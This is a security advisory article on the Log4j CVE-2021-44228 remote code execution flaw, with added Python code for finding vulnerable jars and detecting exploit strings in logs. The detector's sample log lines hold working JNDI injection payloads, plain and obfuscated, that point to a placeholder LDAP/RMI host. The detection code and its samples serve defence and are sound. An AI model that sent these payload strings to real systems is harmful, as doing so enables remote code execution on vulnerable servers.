Critical Fault with Log4j Software

Attackers are actively exploiting a critical vulnerability in Apache Log4j, a logging library used in potentially millions of Java-based applications, including web-facing ones. Organisations should immediately check whether their applications, especially publicly accessible ones, use the library, and apply mitigations as soon as possible.

This recently disclosed vulnerability in Log4j 2 is reportedly being exploited in the wild, putting widely used applications and cloud services at high risk.

Researchers discovered a critical vulnerability in the Apache Log4j library, which is part of the Apache Logging Project. Log4j is one of the simplest ways to add logging to a Java application, which is why it is so widely used. The Apache Software Foundation has now released fixes for the actively exploited zero-day, which can be weaponised to execute malicious code and take complete control of vulnerable systems.

Log4j is used as a logging package in a variety of popular software from companies including Amazon, Apple iCloud, Elasticsearch, Steam, Tesla and Twitter, and in video games such as Minecraft.

The problem is an unauthenticated remote code execution (RCE) vulnerability, tracked as CVE-2021-44228, in any application that uses the open-source library; it affects Log4j versions 2.0-beta9 up to and including 2.14.1. The bug scored a maximum 10 out of 10 on the CVSS scale, reflecting its severity. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled," the Apache Foundation said in an advisory. "From Log4j 2.15.0, this behavior has been disabled by default."
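The first practical step the advisory implies is finding out which builds of log4j-core are actually deployed. The following is an added example written for this page, not code from the article, Apache or any vendor it mentions: an offline inventory check that walks a directory tree, descends into jars nested inside other jars (fat/uber jars), reads the version from log4j-core's embedded pom.properties, and flags any build in the affected range (2.0-beta9 through 2.14.1) that still contains JndiLookup.class, since deleting that class from the jar was one of the published mitigations for versions that could not be upgraded at once. The jars built by demo() are constructed fixtures with fake bytecode; the directory layout and the BOOT-INF/lib nesting are assumptions chosen to mimic a Spring Boot style fat jar.

```python
"""Added example (not from the article or the Log4j project): offline
inventory check for log4j-core jars, including jars nested in fat jars."""
import io
import os
import re
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(version):
    """Map '2.14.1' or '2.0-beta9' to a comparable tuple; a final release
    sorts above any alpha/beta/rc of the same number."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$",
                 version.strip(), re.I)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, tag, tagnum = m.groups()
    rank = {"alpha": 0, "beta": 1, "rc": 2}
    pre = (0, rank[tag.lower()], int(tagnum)) if tag else (1, 0, 0)
    return (int(major), int(minor), int(patch or 0)) + pre


VULN_LOW = parse_version("2.0-beta9")
VULN_HIGH = parse_version("2.14.1")


def is_vulnerable_version(version):
    """True for the affected range quoted in the advisory. Caveat: the
    project later published backport releases on the 2.3.x and 2.12.x lines
    for old Java runtimes; those are fixed but fall inside this numeric
    range, so check the project's own advisory if you see them."""
    return VULN_LOW <= parse_version(version) <= VULN_HIGH


def inspect_jar_bytes(data, path):
    """Return (path, version, has_jndi_lookup) for this jar and any jar
    nested inside it; jars without log4j-core markers contribute nothing."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        has_jndi = JNDI_CLASS in names
        if POM_PROPS in names or has_jndi:
            version = "unknown"
            if POM_PROPS in names:
                props = zf.read(POM_PROPS).decode("utf-8", "replace")
                m = re.search(r"^version=(.+)$", props, re.M)
                if m:
                    version = m.group(1).strip()
            findings.append((path, version, has_jndi))
        for name in sorted(names):
            if name.lower().endswith(".jar"):  # fat jar: recurse into it
                findings.extend(inspect_jar_bytes(zf.read(name), f"{path}!/{name}"))
    return findings


def needs_action(version, has_jndi):
    """A vulnerable or unidentifiable build that still ships JndiLookup."""
    if not has_jndi:
        return False
    try:
        return version == "unknown" or is_vulnerable_version(version)
    except ValueError:
        return True  # unparseable version string: a human should look


def scan_tree(root):
    """Scan every .jar under root -> {relative path: (version, has_jndi, needs_action)}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if not fn.lower().endswith(".jar"):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                for path, version, has_jndi in inspect_jar_bytes(fh.read(), full):
                    outer, _, inner = path.partition("!/")
                    rel = os.path.relpath(outer, root) + ("!/" + inner if inner else "")
                    report[rel] = (version, has_jndi, needs_action(version, has_jndi))
    return report


def build_sample_jar(path, version, include_jndi, nest_as=None):
    """Constructed fixture: minimal jar with log4j-core's metadata layout and
    fake bytecode; with nest_as it is wrapped under BOOT-INF/lib/ (assumed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    data = buf.getvalue()
    if nest_as:
        outer = io.BytesIO()
        with zipfile.ZipFile(outer, "w") as zf:
            zf.writestr(f"BOOT-INF/lib/{nest_as}", data)
        data = outer.getvalue()
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Build four constructed jars in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
        build_sample_jar(os.path.join(root, "log4j-core-2.15.0.jar"), "2.15.0", True)
        build_sample_jar(os.path.join(root, "log4j-core-2.14.1-nojndi.jar"), "2.14.1", False)
        build_sample_jar(os.path.join(root, "app.jar"), "2.13.3", True,
                         nest_as="log4j-core-2.13.3.jar")
        return scan_tree(root)


if __name__ == "__main__":
    for path, (version, has_jndi, action) in demo().items():
        print(f"{'ACTION' if action else 'ok    '} {path} version={version} JndiLookup={has_jndi}")
```

Run it against a real deployment by replacing demo() with scan_tree("/opt/yourapp"). The version check only mirrors the range the advisory quotes; a jar whose pom.properties is missing but which still carries JndiLookup.class is reported as "unknown" and flagged, because a shaded or repackaged build is exactly where the library tends to hide.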

Exploitation requires only a single string of text: if that string is logged by a vulnerable instance of Log4j, the library's message lookup feature resolves a JNDI reference embedded in it and makes the application connect to an attacker-controlled host, from which it retrieves a payload and executes it locally.
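Because the trigger is just a string that reaches a logger, the defender's counterpart is to look for that string in whatever was logged or received: web access logs, User-Agent headers, form fields. The following is an added example written for this page, not code from the article or any of the sources it cites. It normalises the common obfuscations attackers wrap around the lookup (URL encoding, `${lower:...}`/`${upper:...}` case tricks and the `${...:-x}` default-value trick that resolves to `x` when the key is unset) by repeatedly evaluating the innermost lookups, then matches the decoded `${jndi:<scheme>:` form. The log lines are constructed samples using TEST-NET addresses, not real traffic; the set of obfuscation lookups modelled is an assumption based on what has been widely reported in scanning traffic and is deliberately a heuristic rather than a full Log4j lookup evaluator.

```python
"""Added example (not from the article): de-obfuscate and detect Log4j
JNDI lookup strings in log lines. Sample lines are constructed."""
import re
import urllib.parse

# A lookup with no nested lookup inside it (the innermost level).
INNER = re.compile(r"\$\{([^${}]*)\}")
# The dangerous form once obfuscation has been stripped away.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)


def _resolve(inner):
    """Evaluate one innermost lookup the way the common obfuscation tricks
    rely on. Returns None for anything not modelled, so it is kept as-is."""
    _key, sep, default = inner.partition(":-")
    if sep:                      # ${::-j} or ${env:NOPE:-j}: default value wins
        return default
    name, sep, arg = inner.partition(":")
    if sep and name.strip().lower() == "lower":
        return arg.lower()
    if sep and name.strip().lower() == "upper":
        return arg.upper()
    return None


def normalize(text, max_rounds=50):
    """URL-decode, then collapse nested obfuscation lookups from the inside
    out until nothing changes (bounded so hostile input cannot loop forever)."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def scan_lines(lines):
    """Return [(line_number, decoded lookup)] for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            hits.append((n, norm[m.start():end + 1] if end != -1 else norm[m.start():]))
    return hits


# Constructed access-log samples (TEST-NET-3 addresses); not real traffic.
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Dec/2021:14:03:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:03:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.99:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:03:13 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Armi%3A%2F%2F203.0.113.99%3A1099%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '203.0.113.10 - - [10/Dec/2021:14:03:14 +0000] "GET /docs?q=${HOME} HTTP/1.1" '
    '200 128 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:14:03:15 +0000] "GET /search?q=jndi+tutorial '
    'HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, lookup in scan_lines(SAMPLE_LINES):
        print(f"line {n}: {lookup}")
```

The last two sample lines are there to show what does not fire: a plain `${HOME}` and the word "jndi" on its own are left alone, which matters when this runs over millions of lines. For triage, the decoded lookup is what you want in the alert, because the raw obfuscated form tells an analyst nothing about where the callback was going.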

Given how widely Log4j is deployed across enterprise IT and DevOps tooling, it is vital that users address the flaw immediately, by upgrading to a fixed release or, where that is not yet possible, applying the published mitigations.

The Israeli cyber security firm Cybereason has released a mitigation tool called Logout4Shell that uses the vulnerability itself to reconfigure the logger and block further exploitation; it is a stop-gap for systems that cannot be patched at once, not a replacement for upgrading. "This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string," security expert Marcus Hutchins said in a tweet.

Sources: CERT.NZ, Hacker News, Marcus Hutchins, Kaspersky, Techtarget, Logging Apache, CSO Online

